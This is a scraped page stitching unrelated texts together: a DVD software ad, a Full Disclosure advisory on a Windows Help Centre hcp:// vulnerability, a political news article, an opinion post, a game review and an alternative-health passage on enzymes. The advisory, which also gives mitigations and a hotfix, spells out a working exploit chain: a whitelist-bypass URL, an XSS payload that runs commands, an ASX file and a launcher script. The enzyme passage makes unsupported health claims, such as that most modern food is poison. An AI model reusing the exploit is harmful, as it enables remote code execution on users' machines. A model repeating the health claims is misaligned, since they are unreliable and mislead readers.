Click to view large pictures Input File Format Support DVD - Video , DVD folder , ISO image file Output File Format Support DVD - Video , DVD folder , ISO image file OS : 32 bit : Mac OS X v10.6 - 10.14 ( Mojave )
64 bit : Mac OS X v10.9 - 10.15 ( Catalina ) Processor : PowerPC ® G4/G5 or Intel® processor RAM : 512MB RAM Free Hard Disk : 60 MB free hard disk space for installation Graphic Card : Super VGA ( 800×600 ) resolution , 16 - bit graphics card or higher Others : Recordable DVD drive Tutorial : How to use ImTOO DVD Copy for Mac ?
Support :
Free technical support is offered to all users via support@imtoo.com
User Reviews " ... I really like this DVD Copy for Mac software .
I am particularly impressed that it can copy DVD on Mac perfectly in 1:1 ratio .
It is clear that some real careful thought went into designing this product so it would be the most useful to users in both the US and Europe .... "
Nico B , The Netherlands " First of all I would like to thank you for your wonderful customer support .
I am a complete newbie to this copy DVD thing , with your Step by Step Tutorials I was able to get my first own DVD movie .
I 'll be telling all my family , friends and co-workers about this great software and service . "
Mark , USA
Full Disclosure mailing list archives
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
----------------------------------------------------------------------------
Help and Support Centre is the default application provided to access online documentation for Microsoft Windows .
Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme " hcp " , a typical example is provided in the Windows XP Command Line Reference , available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
Using hcp:// URLs is intended to be safe , as when invoked via the registered protocol handler the command line parameter / fromhcp is passed to the help centre application .
This flag switches the help centre into a restricted mode , which will only permit a whitelisted set of help documents and parameters .
This design , introduced in SP2 , is reasonably sound .
A whitelist of trusted documents is a safe way of allowing interaction with the documentation from less - trusted sources .
Unfortunately , an implementation error in the whitelist allows it to be evaded .
URLs are normalised and unescaped prior to validation using MPC :: HTML :: UrlUnescapeW ( ) , which in turn uses MPC :: HexToNum ( ) to translate URL escape sequences into their original characters , the relevant code from helpctr.exe 5.1.2600.5512 ( latest at time of writing ) is below .
. text :0106684C Unescape : .text :0106684C cmp di , ' % ' ; di contains the current wchar in the input URL .
. text :01066850 jnz short LiteralChar ; if this is not a ' % ' , it must be a literal character .
. text :01066852 push esi ; esi contains a pointer to the current position in URL to unescape .
. text :01066853 call ds : wcslen ; find the remaining length .
. text :01066859 cmp word ptr [ esi ] , 'u ' ; if the next wchar is 'u ' , this is a unicode escape and I need 4 xdigits .
.text :0106685D pop ecx ; this sequence calculates the number of wchars needed ( 4 or 2 ) .
. text :0106685E setz cl ; i.e. %uXXXX ( four needed ) , or %XX ( two needed ) .
. text:01066861 mov dl , cl .text :01066863 neg dl .text :01066865 sbb edx , edx .text :01066867 and edx , 3 .text :0106686A inc edx .text :0106686B inc edx .text :0106686C cmp eax , edx ; test if I have enough characters in input to decode .
. text :0106686E jl short LiteralChar ; if not enough , this ' % ' is considered literal .
. text :01066870 test cl , cl .text :01066872 movzx eax , word ptr [ esi+2 ] . text:01066876 push eax .text:01066877 jz short NotUnicode .text:01066879 call HexToNum ; call MPC :: HexToNum ( ) to convert this nibble ( 4 bits ) to an integer .
. text :0106687E mov edi , eax ; edi contains the running total of the value of this escape sequence .
. text :01066880 movzx eax , word ptr [ esi+4 ] . text :01066884 push eax . text :01066885 shl edi , 4 ; shift edi left 4 positions to make room for the next digit , i.e. total <<= 4 ; .text :01066888 call
HexToNum .text:0106688D or edi , eax ; or the next value into the 4 - bit gap , i.e. total |= val .
.text :0106688 F movzx eax , word ptr [ esi+6 ] ; this process continues for the remaining wchars .
. text :01066893 push eax .text :01066894 shl edi , 4 .text :01066897 call HexToNum .text:0106689C or edi , eax .text :0106689E movzx eax , word ptr [ esi+8 ] . text :010668A2 push eax .text :010668A3 shl edi , 4 .text :010668A6 call HexToNum .text:010668
AB
or edi , eax .text :010668
AD add esi , 0Ah ; account for number of bytes ( not chars ) consumed by the escape .
. text :010668B0 jmp short FinishedEscape .text:010668B2 .text:010668B2 NotUnicode : .text :010668B2 call HexToNum ; this is the same code , but for non-unicode sequences ( e.g. % 41 , instead of % u0041 ) . text :010668B7 mov edi , eax .text :010668B9 movzx eax , word ptr [ esi ] .text :010668
BC push eax .text :010668 BD call HexToNum .text:010668C2 shl eax , 4 .text :010668C5 or edi , eax .text :010668C7 add esi , 4 ; account for number of bytes ( not chars ) consumed by the escape .
.text :010668CA .text :010668CA
FinishedEscape : .text :010668
CA test di , di .text :010668 CD jz short loc_10668DA .text :010668 CF .text :010668CF
LiteralChar : .text :010668CF
push edi ; append the final value to the normalised string using a std:: string append .
. text :010668D0 mov ecx , [ ebp+unescaped ] .text :010668D3 push 1 .text :010668D5 call std::string::append .text:010668
DA mov di , [ esi ] ; fetch the next input character .
. text :010668 DD test di , di ; have we reached the NUL terminator ?
. text :010668E0 jnz Unescape ; process next char .
This code seems sane , but an error exists due to how MPC :: HexToNum ( ) handles error conditions , the relevant section of code is annotated below .
. text :0102D32A mov edi , edi .text :0102D32C push ebp .text:0102D32D mov ebp , esp ; function prologue .
. text:0102D32 F mov eax , [ ebp+arg_0 ] ; fetch the character to convert .
. text :0102D332 cmp eax , ' 0 ' . text :0102D335 jl short CheckUppercase ; is it a digit ?
.text:0102D337 cmp eax , ' 9 ' .text :0102D33A jg short CheckUppercase .text:0102D33C add eax , 0FFFFFFD0h ; atoi( ) , probably written val - ' 0 ' and optimised by compiler .
. text :0102D33 F jmp short Complete .text:0102D341 CheckUppercase : .text :0102D341 cmp eax , ' A ' . text :0102D344 jl short CheckLowercase ; is it an uppercase xdigit ?
. text :0102D346 cmp eax , ' F ' .text :0102D349 jg short CheckLowercase .text:0102D34B add eax , 0FFFFFFC9h ; atoi( ) .text :0102D34E jmp short Complete .text:0102D350 CheckLowercase : .text :0102D350 cmp eax , ' a ' .text :0102D353 jl short Invalid ; lowercase xdigit ?
.text:0102D355 cmp eax , 'f ' .text :0102D358 jg short Invalid .text:0102D35A add eax , 0FFFFFFA9h ; atoi( ) .text:0102D35D jmp short Complete .text:0102D35 F
Invalid : .text:0102D35 F or eax , 0FFFFFFFFh ; invalid character , return - 1 .text :0102D362 Complete : .text:0102D362 pop ebp .text:0102D363 retn 4 Thus , MPC :: HTML :: UrlUnescapeW ( ) does not check the return code of MPC :: HexToNum ( ) as required , and therefore can be manipulated into appending unexpected garbage onto std:: strings .
This error may appear benign , but we can use the miscalculations produced later in the code to evade the / fromhcp whitelist .
Assuming that we can access arbitrary help documents ( full details of how the MPC : : error can be used to accomplish this will be explained below ) , we must identify a document that can be controlled purely from the URL used to access it .
After browsing the documents available in a typical installation , the author concluded the only way to do this would be a cross site scripting error .
After some careful searching , a candidate was discovered : hcp://system/sysinfo/sysinfomain.htm?svr=<h1>test</h1 >
This document is available in a default installation , and due to insufficient escaping in GetServerName ( ) from sysinfo / commonFunc.js , the page is vulnerable to a DOM - type XSS .
However , the escaping routine will abort encoding if characters such as ' = ' or ' " ' or others are specified .
It 's not immediately obvious that this error is still exploitable , simple tricks like < img src=bad onerror=code > do n't apply , and < script > code < / script > is n't helpful as the code is n't evaluated again .
In situations like this , the best course of action is to harass lcamtuf until he gives you the solution , which of course his encyclopaedic knowledge of browser security quirks produced immediately .
< script defer>code</ script >
The defer property is an IE - ism which solves the problem , documented by Microsoft here http://msdn.microsoft.com/en-us/library/ms533719%28VS.85%29.aspx.
Now that we are armed with knowledge of this trick , because these help documents are in a privileged zone , we can simply execute commands .
You can test this with a command like so ( assuming a recent IE ) : C:\> ver Microsoft Windows XP [ Version 5.1.2600 ] C:\> c:\windows\pchealth\helpctr\binaries\helpctr.exe -url " hcp://system/sysinfo/sysinfomain.htm?svr=<script defer>eval( unescape(' Run%28%22calc.exe%22%29 ' ) )</ script > " C:\>
While this is fun , this is n't a vulnerability unless an untrusted third party can force you to access it .
Testing suggests that by default , accessing an hcp:// URL from within Internet Explorer >= 8 , Firefox , Chrome ( and presumably other browsers ) will result in a prompt .
Although most users will click through this prompt ( perfectly reasonable , protocol handlers are intended to be safe ) , it 's not a particularly exciting attack .
I 've found a way to avoid the prompt in a default Windows XP installation in all major browsers ,
The solution is to invoke the protocol handler from within an < iframe > in an ASX HtmlView element .
There are probably other ways .
http://en.wikipedia.org/wiki/Advanced_Stream_Redirector
The version of Windows Media Player that is available by default in Windows XP is WMP9 , which installs an NPAPI and ActiveX plugin to render windows media content .
Later versions also can be used , with some minor complications .
Thus , the attack will look like this : $ cat simple.asx < ASX VERSION = " 3.0 " > < PARAM name = " HTMLView " value= " http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/starthelp.html " /> < ENTRY > < REF href= " http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/bug-vs-feature.jpg " /> </ ENTRY > </ ASX >
Where starthelp .
html contains something like : $ cat starthelp.html < iframe src=" hcp://... " >
Forcing a user to read an .ASX file can be achieved in a cross - browser manner like so : $ cat launchurl .
html < html > < head >< title > Testing HCP </ title ></head > < body >
< h1>OK</h1 > < script > // HCP:// Vulnerability , Tavis Ormandy , June 2010 .
var asx = " http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/simple.asx " ; if ( window.navigator.appName == " Microsoft Internet Explorer " ) { // Internet Explorer var o = document.createElement ( " OBJECT " ) ; o.setAttribute ( " classid " , " clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6 " ) ; o.openPlayer ( asx ) ; } else { // Mozilla , Chrome , Etc. var o = document.createElement ( " IFRAME " ) ; o.setAttribute ( " src " , asx ) ; document.body.appendChild(o ) ; } </script > </ body > </html >
Therefore , we have the following interactions between multiple complex systems chained together : - From an html page , email , document , or other application force a user to fetch a .ASX file containing an HtmlView element .
- From the HtmlView element , invoke the hcp protocol handler that would normally require confirmation .
- From the HCP Protocol handler , bypass the / fromhcp whitelist by using the string miscalculations caused by failing to check the return code of MPC :: HexToNum ( ) .
-
Once the whitelist has been defeated , invoke the Help document with a known DOM XSS due to GetServerName ( ) insufficient escaping .
-
Use the defer property of a script tag to execute script in a privileged zone even after the page has been rendered .
- Invoke an arbitrary command using the wscript .
shell object .
Figuring out how to use the MCP :: HexToNum ( ) error to defeat the / fromhcp whitelist took some analysis , but the result looks like the following .
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%
A % %A %%A %%A %%A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A %%
A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A %%A % % A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A % %A ..%5 C..%5Csysinfomain.htm%u003fsvr=%3 Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29 % 3C/ script%3E
--------------------
Affected Software
------------------------
At least Microsoft Windows XP , and Windows Server 2003 are affected .
The attack is enhanced against IE >= 8 and other major browsers if Windows Media Player is available , but an installation is still vulnerable without it .
Machines running version of IE less than 8 are , as usual , in even more trouble .
In general , choice of browser , mail client or whatever is not relevant , they are all equally vulnerable .
--------------------
Consequences
-----------------------
Upon successful exploitation , a remote attacker is able to execute arbitrary commands with the privileges of the current user .
I 've prepared a demonstration for a typical Windows XP installation with Internet Explorer 8 , and the default Windows Media Player 9 .
http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/launchurl.html
In IE7 on Windows XP , just visiting this URL should be sufficient : http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/starthelp.html
Some minor modifications will be required to target other configurations , this is simply an attempt to demonstrate the problem .
I 'm sure the smart guys at metasploit will work on designing reliable attacks , as security professionals require these to do their jobs .
Additionally , my demonstration is not intended to be stealthy , a real attack would barely be noticable to the victim .
Perhaps the only unavoidable signal would be the momentary appearance of the Help Centre window before the attacker hides it .
There are multiple trivial techniques that can be used to accomplish this .
Browsers are useful to demonstrate the problem , but there are certainly other attack vectors , such as MUAs , documents , etc. Protocol handlers are designed to be used across applications .
-------------------
Mitigation -----------------------
If you believe you may be affected , you should consider applying one of the workarounds described below .
Few users rely on Help Centre urls , it is safe to temporarily disable them by removing HKCR\HCP \shell\open .
This modification can be deployed easily using GPOs .
For more information on Group Policy , see Microsoft's Group Policy site , here http://technet.microsoft.com/en-us/windowsserver/bb310732.aspx
A few caveats , * I am aware that some support technicians rely on the Remote Assistance tool provided by the Help Center application using shortcuts like " explorer.exe hcp://CN=Microsoft%20Corporation,L=Re... " .
You can continue to use this technique by substituting " explorer.exe hcp ://... " for " helpctr.exe /url hcp ://... " , without relying on the protocol handler .
*
One or two links in explorer , such as selecting " Help " from the Control Panel category view , may no longer function .
If this concerns you , it is possible to gracefully degrade by replacing the protocol handler with a command to open a static intranet support page , e.g. " chrome.exe http://techsupport.intranet " .
*
As always , if you do not use this feature , consider permanently disabling it in order to reduce attack surface .
Historically , disabling unused protocol handlers has always proven to be a wise investment in security .
In the unlikely event that you heavily rely on the use of hcp :// , I have created an unofficial ( temporary ) hotfix .
You may use it under the terms of the GNU General Public License , version 2 or later .
Of course , you should only use it as a last resort , carefully test the patch and make sure you understand what it does ( full source code is included ) .
It may be necessary to modify it to fit your needs .
The package is availble for x86 here : http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip
[ NOTE : Please avoid linking to this file out of context , it is intended for consideration as a potential mitigation by experienced administrators , and is not suitable for consumption by end -users ]
The hotfix intercepts helpctr.exe invokations , and patches MPC :: HexToNum ( ) to return zero on error , rather than - 1 .
Nothing is changed on disk , and it can be safely removed at anytime .
Of course , the result of an invalid unescape is still incorrect , but this specific vulnerability should be rendered inert .
I would be greatful if the community could contribute bugfixes , testing , an x64 port , and so on .
Once information is in the open , we can all collaborate on our collective security .
Some clarifications , * Fixing the XSS is not a solution , the root cause is the whitelist evasion , any mitigation that does not address this is simply papering over the issue .
An army of researchers that specialise in XSS exists , and i'm sure they will turn their attention to help documents once they realise their value .
Assume more will be discovered .
*
That said , if you are an XSS expert , examples in whitelisted pages ( / services / index , / services / search , etc. ) would be useful , your skills could be helpful making this important software safe .
* Removing Windows Media player is not a solution , it simply makes a fun demo for IE8 and other modern browsers .
Finally , you should take this opportunity to disable all browser plugins and SFS ActiveX controls that are not regularly used .
End users can do this themselves in Google Chrome by viewing about : plugins and disabling the plugins that are not required .
In Mozilla Firefox , use the Tools -> Add-ons ->Plugins interface .
-------------------
Solution -----------------------
Microsoft was informed about this vulnerability on 5 - Jun - 2010 , and they confirmed receipt of my report on the same day .
Protocol handlers are a popular source of vulnerabilities , and hcp :// itself has been the target of attacks multiple times in the past .
I 've concluded that there 's a significant possibility that attackers have studied this component , and releasing this information rapidly is in the best interest of security .
Those of you with large support contracts are encouraged to tell your support representatives that you would like to see Microsoft invest in developing processes for faster responses to external security reports .
-------------------
Credit -----------------------
This bug was discovered by Tavis Ormandy .
-------------------
Greetz -----------------------
Greetz to Neel , Mark , Redpig , Spoonm , Skylined , asiraP , LiquidK , ScaryBeasts , Hawkes , Jagger , and all my other pimp colleagues .
Special thanks to lcamtuf for his assistance with the deferred execution problem .
You should read his Browser Security Handbook if you need to understand how web browser security / really / works .
http://code.google.com/p/browsersec/wiki/Main
A colleague is organising a conference in Lucerne , Switzerland .
He would really appreciate interesting papers from security people who want to talk about their research ( travel , hotel , etc. covered ) .
https://www.hashdays.ch/
-------------------
Notes
-----------------------
I would like to point out that if I had reported the MPC :: HexToNum ( ) issue without a working exploit , I would have been ignored .
Without access to extremely smart colleagues , I would likely have given up , leaving you vulnerable to attack from those who just want root on your network and do not care about disclosure policies .
This is another example of the problems with bug secrecy ( or in PR speak , " responsible disclosure " ) , those of us who work hard to keep networks safe are forced to work in isolation without the open collaboration with our peers that we need , especially in complex cases like this , where creative thinking and input from experts in multiple disciplines is required to join the dots .
A good place to start researching full disclosure would be this accessible and insightful essay by Bruce Schneier .
http://www.schneier.com/essay-146.html
His balanced coverage of the debate is also available in this essay .
http://www.schneier.com/crypto-gram-0111.html#1
Finally , a reminder that this documents contains my own opinions , I do not speak for or represent anyone but myself .
-------------------
References ----------------------- hcp:// has been broken a few times over the years , for example : - http://seclists.org/bugtraq/2002/Aug/225,
Delete arbitrary files using Help and Support Center - http://www.microsoft.com/technet/security/bulletin/ms03-044.mspx, HCP memory corruption by Dave Litchfield .
The current design is actually pretty sound , I 'm sure Microsoft are dissapointed they missed this flaw .
In their defense , I think there 's a good chance I would have also missed this in code review .
--
------------------------------------- taviso ( ) cmpxchg8 b com | pgp encrypted mail preferred
-------------------------------------------------------
_______________________________________________
Full - Disclosure -
We believe in it .
Charter : http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
By Date By Thread
Current thread :
Watch out !
A comic is buzzing nearby .
It was created despite Wes falling hard while Tony groomed men for his new brother - in - law .
For Democrats such as Reps. Deborah Halvorson ( Ill. ) and Zack Space ( Ohio ) , the court ’s decision could n’t have been more beneficial to the cause in November .
| AP photo composite by POLITICO
Dems quietly cheer gun ruling
When the Supreme Court extended the individual right to own a gun Monday , it handed Second Amendment advocates — many of whom are at home in the GOP — one of their most significant legal victories ever .
But who won the day in politics ?
The Democrats .
Advertisement
For them , the court ’s groundbreaking decision could n’t have been more beneficial to the cause in November .
Now , Democratic candidates across the map figure they have one less issue to worry about on the campaign trail .
And they wo n’t have to defend Republican attacks over gun rights and an angry , energized base of gun owners .
“ It removes guns as a political issue because everyone now agrees that the Second Amendment is an individual right , and everybody agrees that it ’s subject to regulation , ” said Lanae Erickson , deputy director of the culture program at centrist think tank Third Way .
A House Democratic aide agreed that the court ’s decision removed a potentially combustible element from the mix .
“ The Supreme Court ruled here that you have a fundamental right to own and bear arms , and that means at the national level it ’s harder — whether it ’s Republicans or whether it ’s the [ National Rifle Association ] — to throw that claim out :
If Democrats are in charge .
they ’re going to come get your guns , ” said the aide .
“ It pretty much took that off the table . ”
The likely removal — or at least neutralization — of the gun issue this fall is of no small matter in the battle for the House and Senate .
The Democratic majorities in both chambers were built , in part , on victories in pro-gun states and districts that had until recently been difficult terrain for Democratic candidates as a result of the national party ’s position on gun control .
The chorus of responses to Monday ’s ruling was a group of normally dissonant voices :
It proved the rare occasion when both former Alaska Gov. Sarah Palin and Senate Majority Leader Harry Reid could find common ground .
In a Facebook post titled “ Another Victory for the Second Amendment , ” Palin wrote that the case “ should leave little doubt that our individual right to keep and bear arms applies everywhere and is a right for everyone . ”
Reid essentially agreed , calling the right to bear arms “ one of the essential freedoms on which our country was founded . ”
“ I am pleased that the high court has taken steps in both the Heller and McDonald cases to guarantee this fundamental right , ” he said in a prepared statement , referring to both the 2008 Heller decision , which struck down the District of Columbia ’s restrictive gun law , and Monday ’s McDonald v. Chicago decision against Chicago ’s handgun ban .
For congressional Democrats — especially those in seats outside major metropolitan areas where support for gun rights runs high — the ruling offered a chance to assert their pro-gun bona fides .
Rep. Zack Space ( D - Ohio ) , a second - term Democrat representing a rural and small - town district in eastern Ohio , quickly sent a blast to his “ Constitution - loving ” constituents .
“ Today ’s ruling has put the Supreme Court on the side of every Constitution - loving American , ” he said in the e-mail .
“ Our right to keep and bear arms is a cornerstone of our Constitution , given to us by our Founding Fathers , and it can never be taken away . ”
Also quick with praise were Democratic Reps .
Tom Perriello of Virginia , Ann Kirkpatrick of Arizona and Travis Childers of Mississippi , all facing tough races in November and all representing districts with large rural components where gun ownership rights are sacrosanct .
“ Of course , we were watching for the decision , but if you work for someone whose response to Heller was ‘ it ’s about time , ’ then you were probably prepared for this decision , whichever way it went , ” said John Foster , campaign manager for freshman Rep .
Walt Minnick ( D - Idaho ) , who noted that Minnick has made it a point to visit the gun ranges and ammunition and boutique gun manufacturers in his strongly conservative district .
John Anzalone , a prominent Alabama - based pollster with a roster of Southern Democratic clients , called it a “ win , win , win , win ” situation for everyone and , above all , “ for conservative Democrats who will be able to use it as a credential that they ’re conservative .
This is a tough political environment ; you ’re going to see Southern , Western Democrats use it and stand up for gun rights . ”
And it was n’t just Southern and Western Democrats who embraced the ruling .
“ The decision by the United States Supreme Court to uphold the freedoms guaranteed in our Constitution is a major victory for Americans , ” said Deborah Halvorson ( D - Ill. ) , who represents a district that extends well beyond the Chicago metropolitan area and who is in a competitive race with Republican challenger Adam Kinzinger .
The Democratic sigh of relief after the McDonald decision was n’t exactly a surprise — 80 House Democrats and 19 Senate Democrats signed onto an amicus brief opposing the Chicago gun ban , a tacit recognition that , for many Democratic legislators , gun control advocacy is akin to political suicide .
That “ highlights a pretty significant shift that ’s gone on in gun politics , ” the Democratic aide said .
“ Last week , just the debate over the campaign finance bill highlighted how deep the NRA ’s inroads into the Congress have gone with both parties , but especially with Democrats .
over the last four years , ” the aide said , referring to a last - minute change that exempts the NRA and other grass - roots groups from major new campaign finance rules .
“ There are n’t any other organizations out there that have 4 million dues - paying members , period .
That ’s why they ’re effective , agree or disagree with their agenda . ”
The NRA ’s top lobbyist , Chris Cox , was careful to call this “ the end of the beginning ” and promised a slew of lawsuits challenging local laws .
But in the end , he said , the law is “ a vindication , and it ’s really what the American people have always felt and always known , that the Second Amendment protected an individual right to own a gun regardless of where you live . ”
The press is making a big thing about all of the democratic candidates raising their hands to say that they will offer health care to undocumented families .
All of these people have said health care is a basic human right .
The only way you can not offer health care to everybody in the United States is to say that those you refuse to offer health care to are not human .
Every time a democratic candidate is asked about health care for undocumented families they must first set the predicate .
They must first ask , “ Do you believe health care is a human right ? ”
If the questioner refuses to answer move on from the question because you are engaging on two completely different moral planes .
If they do answer that it is a basic human right then ask , are undocumented families human .
End of discussion .
If they say health care is a privilege , ask them privilege for who .
If they say health care is an American citizen right ask them to explain the logic ( spoiler alert , there is not logical argument for this ) .
The candidates cannot and should not back down from health care for undocumented families .
They should turn it against their opponents ( and the journalists who ask these types of inhumane questions ) .
I have never encountered a game as noncompliant as Lost Planet 2 .
With no internet connection present , I had to tell it repeatedly that I wanted to play a single player campaign at which point it asked me how many other people would be joining me .
I get it Lost Planet 2 , you ’re intended as a cooperative experience , but your downfall is that you need more than one person playing at a time to consider you entertainment .
it ’s sort of like playing a video game , only without all the fun bits .
I seem to remember Lost Planet 1 being your standard third person shooter with space marines shooting aliens .
So why does Lost Planet 2 think it ’s the next Left 4 Dead ?
If you try to play single player , the game throws a great big tantrum .
When you exit a map there ’s a 10 second time delay , as if all your nonexistent friends were n’t quite done looting yet .
Your AI buddies all have stupid names like XXkiller 52 floating over their heads .
The maps have group based objectives like defending multiple capture points simultaneously even though the AI could n’t defend a dandelion from a gentle breeze , let alone giant aliens .
There is almost no penalty for death , since they do n’t want the game to end if one person screws up .
There ’s even one level all about operating an enormous tank which requires four people working in unison across multiple decks to fire , but the AI kicks back the whole time in the break room having a smoke while you get devoured by a worm the size of a 300 foot tall , eight mile long worm .
The controls are an unresponsive mess .
The zoom - to - scope function is on the D - pad and frequently nudges the night vision goggles .
Night vision , by the way , is never needed as the lighting is 99 % bloom and 1 % genuine light sources , so night vision just outlines things in green rather than making anything more visible .
Lost Planet 2 is a fan of over generalizing .
I get the feeling the dialogue was written long before the earliest concept sketches came out of the art department .
Every alien in the game is called an Akrid , and every big one is a Category - G. I suppose categories A through F all got killed in the last game .
Every vehicle , robot , and oversized gun in the game is referred to as a VS , and they do n’t even say what VS stands for .
So if you ’re in an enemy base and someone yells out “ incoming VS ” you do n’t know if that means there ’s a small turret around the next corner , or a three - story tall hover tank is about to blow up the whole building .
Just over half way through the game someone mentions the enemy using Akrid VS ’s which could literally mean anything in the game .
In fact , I think every department involved with the making of Lost Planet 2 had no connection to any other department .
For example the cut scenes which depict player characters in combat always depicts the exact opposite of what you ’re capable of doing in the game .
In one of the first cut scenes someone uses a grappling hook to attach themselves to a giant monster and shoot it Shadow of the Colossus style .
In determined indignation I tried this technique on literally every monster in the game and in every single case I shot toward the monster , glitched right through them and got trampled .
Given this model , it would n’t surprise me in the least if the play testing department submitted its findings directly to the paper shredder .
In another cut scene the player , wearing a SCUBA suit , swims up to a dock and shoots an enemy from underwater before surfacing .
Later in that level I jump back into the water to escape enemy search lights , still wearing my SCUBA suit , and am instantly killed because apparently my character can’t swim anymore .
Aside from promoting player suicide , as though the game were n’t doing that enough already , the cut scenes completely fail to explain the plot .
I was half way through the game , having played four different sets of characters , before I could tell you whether I was a pirate or a space marine and who I was fighting and why .
Turns out you ’re pirates fighting the military because they ’re going to kill some big Akrid in the center of the planet with an orbital laser which will cause the planet to freeze over .
To stop them you have to take control of the giant space laser and kill the big akrid at the center of the planet , and then it turns into a tropical paradise because apparently murder is ok when pirates do it ( is n’t that always the Disney message ? ) .
As for the interceding play , it ’s sort of like playing a video game , only without all the fun bits .
You shoot things and take their thermal energy , which you use to heal yourself by squeezing a magical stress ball .
You die frequently but it ’s ok because you can die about 7 times per level + 2 for each checkpoint you ’ve reached .
Do n’t worry about the fact that dying removes all sense of accomplishment from beating a fight because it kills the immersion and gives you the most permanent sense of failure .
None of the boss fights are fun or rewarding as each is designed to kill you at least five times and frequently more .
They are doable in cooperative modes but not so much single player because the AI buddies who are supposed to help you all run to one corner of the map and stand there doing nothing for minutes at a time .
I had a hard time deciding how much to resent Lost Planet 2 as it ’s obvious it thinks it ’s doing well the whole time , like a dog dropping a dead bird on the carpet .
It has very pretty graphics and the boss battles are very big and impressive .
The play length is even considerably longer than most graphically intense shooters .
But no matter how you look at it , a good musical score and pretty graphics are just polish for the rest of the game , and you ca n’t polish shit .
Dead Weight 1\5
– Tim O’Shea
“ The joy of life depends on a sound stomach whereas bad digestion inclines one to skepticism , incredulity , breeds black fancies , and thoughts of death . ” – Joseph Conrad
Why do we die ?
Why do we age ?
Why do things wear out ?
Do we just live our lives and then all of a sudden out of the blue a disease bug comes floating in from who knows where and causes an illness that kills us ?
Unless of course the right drug can be found to kill the bug .
Do you believe this ?
The majority of people in America actually do .
But some are discovering that lifestyle has everything to do with susceptibility to disease .
Lifestyle : – diet , stress level , mental outlook , daily physical movement , or lack thereof .
Non-bug issues .
Many of us today are becoming disconsolate about seeing our parents die of the same diseases our grandparents died of .
Despite all the “ breakthroughs ” we ’re constantly reading about in the popular press , our health as a nation is not improving in the least .
Heart disease : 616,067
Cancer : 562,875
Stroke : 135,952
Pulmonary disease : 127,924
Accidents : 123,706
Alzheimer ’s disease : 74,632
Diabetes : 71,382
Pneumonia / Flu : 52,717
Kidney Disease : 46,448
Septicemia : 34,828
In Chapter One ( A Normal Life ) we saw the 10 major killers of Americans :
– CDC
Except for accidents , these illnesses are largely preventable ; they are caused or aggravated by years of bad dietary habits .
The top 3 have gone unchanged for the last 30 years .
What does that say about a health care system spending $ 3 trillion annually ?
These diseases do n’t just fly in on the night air and invade our pure , innocent bodies .
Loading up on indigestible , devitalized foods slowly kills the body ’s cells and tissues , week by week , month by month .
Whichever particular organ gives out first – that ’s what we say someone died of : he had a bad heart , he had a bad liver , he had a bad stomach , he was a lunger , etc .
But that ’s not right .
Healthy people do n’t get sick .
The body is either healing or dying , every day .
NAME YER POISON
The principal obstacle to full health is the degree of blood toxicity .
You may think of poisons as things like arsenic , or cyanide , or rat poison , or things that secret agents in James Bond movies bite in capsules just before they ’re captured .
There are many levels and types of poisons .
The best ones kill you the slowest and are undetectable .
Let ’s consider the slowest poisons of all : the food we eat .
Most modern food which the American diet comprises , is poison .
Why do I say that ?
A good poison will :
block the flow of blood , decrease the amount of oxygen to the tissues interfere with one or more major systems of the body , cause addiction to the poison itself eventually kill the subject without ever being detected
No poison in history has achieved these goals on the scale that processed food has .
WHAT ARE ENZYMES ?
We are surrounded by examples of enzyme activity every day .
Take a banana .
A green one .
Put it on a windowsill for a couple days .
It turns yellow and ripens .
That ’s enzymes working .
“ Without enzymes , seeds would not sprout , fruit would not ripen , leaves would not change color , and you would not exist . ”
– D’Raye , p.3 [ 4 ]
Enzymes are properties of all living cells that bring about changes .
Enzymes are specific proteins that are active in every cell of your body every second .
Enzymes change things into usable forms .
As Dr. Royal Lee said long ago , enzymes
“ … are the most important unit in the human body , because every chemical change that takes place to repair tissue or to assimilate food involves the activity of enzymes .
Without enzyme activity there is no life .
No plant or animal can live without the activity of its enzymes . ”
- Conversations , 1955 [ 9 ]
Biologically , we are nothing more than collections of living cells .
What happens to our cells happens to us .
Life functions of cells are mediated by enzymes .
DIFFERENCE BETWEEN ENZYMES AND ENZYME ACTIVITY
By themselves enzymes are just pieces to the puzzle .
For enzymes to actually perform the thousands of tasks they do , helpers are necessary .
Doctors call these helpers co-factors .
Most co-factors are vitamins and minerals .
The enzyme and the co-factors orchestrate themselves in an ultra sophisticated biochemical symphony called a complex .
It is the enzyme complex that brings about enzyme activity – without all the players , the game does n’t happen .
“ Nutrients can not work in isolation …. Absence of any one of these essential nutrients is enough to destroy our health . ” – Erasmus , p 73 [ 20 ]
An enzyme supplement must contain these co-factors .
If it does n’t , the body itself must provide the missing nutrients .
If the patient is vitamin or mineral deficient , taking an isolated enzyme supplement wo n’t have much beneficial effect .
Enzyme activity is a major team effort .
“ An enzyme is a functioning mechanism , not a chemical ….
an enzyme itself is a living principle . ”
- Conversations in Nutrition [ 9 ]
The vitamins we ’re talking about here are not the synthetic ones you usually see in the grocery store .
Only natural whole food vitamins can collaborate with enzymes .
As Dr. Lee wrote almost 50 years ago :
“ When you take a vitamin out of this group and crystallize it and put it in a bottle , it becomes a … chemical .
It is no longer part of the living substance .
It is no longer a part of the living mechanism we call an enzyme . ” [ 9 ]
Vitamins , minerals , and enzymes are the three legs of a stool .
